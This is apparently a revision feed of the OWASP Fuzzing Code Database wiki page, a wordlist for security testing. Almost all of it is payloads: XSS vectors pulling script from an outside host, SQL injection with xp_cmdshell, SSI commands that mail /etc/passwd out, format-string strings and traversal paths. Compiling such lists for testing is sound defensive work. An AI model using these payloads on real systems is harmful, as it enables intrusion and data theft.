&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67376</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67376"/>
				<updated>2009-08-07T14:09:54Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
a&amp;quot; or 1=1--&lt;br /&gt;
&amp;quot; or &amp;quot;a&amp;quot; = &amp;quot;a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
